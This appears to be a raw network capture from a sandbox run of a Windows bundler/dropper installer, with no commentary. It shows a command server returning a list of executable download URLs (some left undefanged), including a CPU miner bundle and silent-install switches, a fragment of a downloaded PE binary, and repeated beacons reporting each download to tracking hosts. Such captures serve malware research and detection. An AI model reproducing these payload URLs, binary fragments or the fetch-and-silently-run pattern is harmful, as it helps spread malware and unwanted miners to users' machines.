GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: 7cg95osLL5z4DfX2gGVw4E9A19i6of3RrseV4p1UfGOZPhyxLZIMoI7hetPOskIW..x-amz-request-id: ABBF092CEF73FE0F..Date: Fri, 25 Sep 2015 20:58:24 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=951432958192de010e9b45488dbf5014&rnd=1178 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: ETbCIvuD8UjYE0xZeD0tbQHzvmuKHcVa0avWQ0T56VW5p06p73E3904tGnYjGMBl
x-amz-request-id: FA7EE3D5977531CE
Date: Fri, 25 Sep 2015 20:58:27 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: ETbCIvuD8UjYE0xZeD0tbQHzvmuKHcVa0avWQ0T56VW5p06p73E3904tGnYjGMBl..x-amz-request-id: FA7EE3D5977531CE..Date: Fri, 25 Sep 2015 20:58:27 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=951432958192de010e9b45488dbf5014&rnd=657 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: TAFU0CDeRM89pJ2JtvsNFoDgWSV3YFwvrv99YU7ezRhDkaT7GInjjZoCgDQjkSLi
x-amz-request-id: A0B545C5DC67D8D1
Date: Fri, 25 Sep 2015 20:58:38 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: TAFU0CDeRM89pJ2JtvsNFoDgWSV3YFwvrv99YU7ezRhDkaT7GInjjZoCgDQjkSLi..x-amz-request-id: A0B545C5DC67D8D1..Date: Fri, 25 Sep 2015 20:58:38 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=951432958192de010e9b45488dbf5014&rnd=3332 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: /gpA3VzNSrpSvLvkktkMvMeuNYZGSFK93/duG1P8exqBeHlxzP2LPa6eUEIr7NiS
x-amz-request-id: D5ED956112D1659E
Date: Fri, 25 Sep 2015 20:58:39 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: /gpA3VzNSrpSvLvkktkMvMeuNYZGSFK93/duG1P8exqBeHlxzP2LPa6eUEIr7NiS..x-amz-request-id: D5ED956112D1659E..Date: Fri, 25 Sep 2015 20:58:39 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;..
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_INSTALL_INI HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:59:01 GMT
Server: Apache/2.2.22 (Debian) mod_ssl/2.2.22 OpenSSL/1.0.1e mod_wsgi/3.3 Python/2.7.3 mod_perl/2.0.7 Perl/v5.14.2
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Fri, 25 Sep 15 20:59:00 GMT
Set-Cookie: _c4aid=F064099CEC1840E3A1022F24CE79668D; expires=Wed, 23 Mar 16 20:59:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=F064099CEC1840E3A1022F24CE79668D,1443214741.14756; expires=Wed, 23 Mar 16 20:59:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 142493);......0..
GET /Generic/vos.php?ch=NOCHPC&rdsn=0&idn=0&sid=&isnw=7&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.3
Date: Fri, 25 Sep 2015 20:57:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.23
365..hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe.. /md=2 /v=som-tot-cpm-opw-crr..hXXp://livestatscounter.com/SysInfo/validator/timer.php..hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe.. q::cCnnykR3kEQycJE x#R3E#nqxkcn:x*:n*x:QcR#*D..hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe.. /ch=NOCHPC..hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe.. /ci 11612..http://VVV.software-forus.com/CPUminer/v6/Bundle_CPUminer.exe.. /ci 12216..hXXp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe../VERYSILENT..hXXp://d10huri5h4o4a3.cloudfront.net/smt.exe..http://d10huri5h4o4a3.cloudfront.net/policyname.exe.. /vpol=som..hXXp://www.codec13sudha.com/download.php?l4J9dw==..hXXp://download-servers.com/SysInfo/Validate.exe.. /s..hXXp://download-servers.com/anyprotect/nosig/AnyProtectSetup.exe../s..0..HTTP/1.1 200 OK..Server: nginx/1.6.3..Date: Fri, 25 Sep 2015 20:57:47 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.5.23..365..hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe.. /md=2 /v=som-tot-cpm-opw-crr..hXXp://livestatscounter.com/SysInfo/validator/timer.php..hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe.. q::cCnnykR3kEQycJE x#R3E#nqxkcn:x*:n*x:QcR#*D..hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe.. /ch=NOCHPC..hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe.. /ci 11612..http://VVV.software-forus.com/CPUminer/v6/Bundle_CPUminer.exe.. /ci 1
<<< skipped >>>
GET /SysInfo/validator/timer.php HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.3
Date: Fri, 25 Sep 2015 20:57:58 GMT
Content-Type: application/octet-stream
Content-Length: 165898
Connection: keep-alive
X-Powered-By: PHP/5.5.23
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename=CESwN2Es.exe
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................P...............................................t.......@...............................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...P...............................rsrc........@.......z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1726\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 20:57:47 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 126
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1727\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"tst=&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 20:57:47 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 20:57:47 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 177
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 20:57:48 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 20:57:48 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 190
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 20:57:58 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 20:57:58 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 181
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/SysInfo/validator/timer.php&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 20:57:58 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 20:57:58 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 194
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/SysInfo/validator/timer.php&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 20:58:09 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 20:58:09 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 183
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 20:58:11 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 20:58:11 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 196
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 20:58:21 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 189
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 20:58:23 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 20:58:23 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 202
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 20:58:33 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 20:58:33 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 20:58:33 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 199
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 20:58:34 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 20:58:34 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 212
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 20:58:44 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 20:58:44 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 187
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://VVV.software-forus.com/CPUminer/v6/Bundle_CPUminer.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 20:58:44 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 20:58:44 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 200
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://VVV.software-forus.com/CPUminer/v6/Bundle_CPUminer.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 20:58:54 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 20:58:54 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 199
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 20:59:00 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 20:59:00 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 212
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 20:59:10 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 20:59:10 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 170
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d10huri5h4o4a3.cloudfront.net/smt.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 20:59:11 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 20:59:11 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 183
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d10huri5h4o4a3.cloudfront.net/smt.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 20:59:21 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 20:59:21 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 177
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d10huri5h4o4a3.cloudfront.net/policyname.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 20:59:21 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
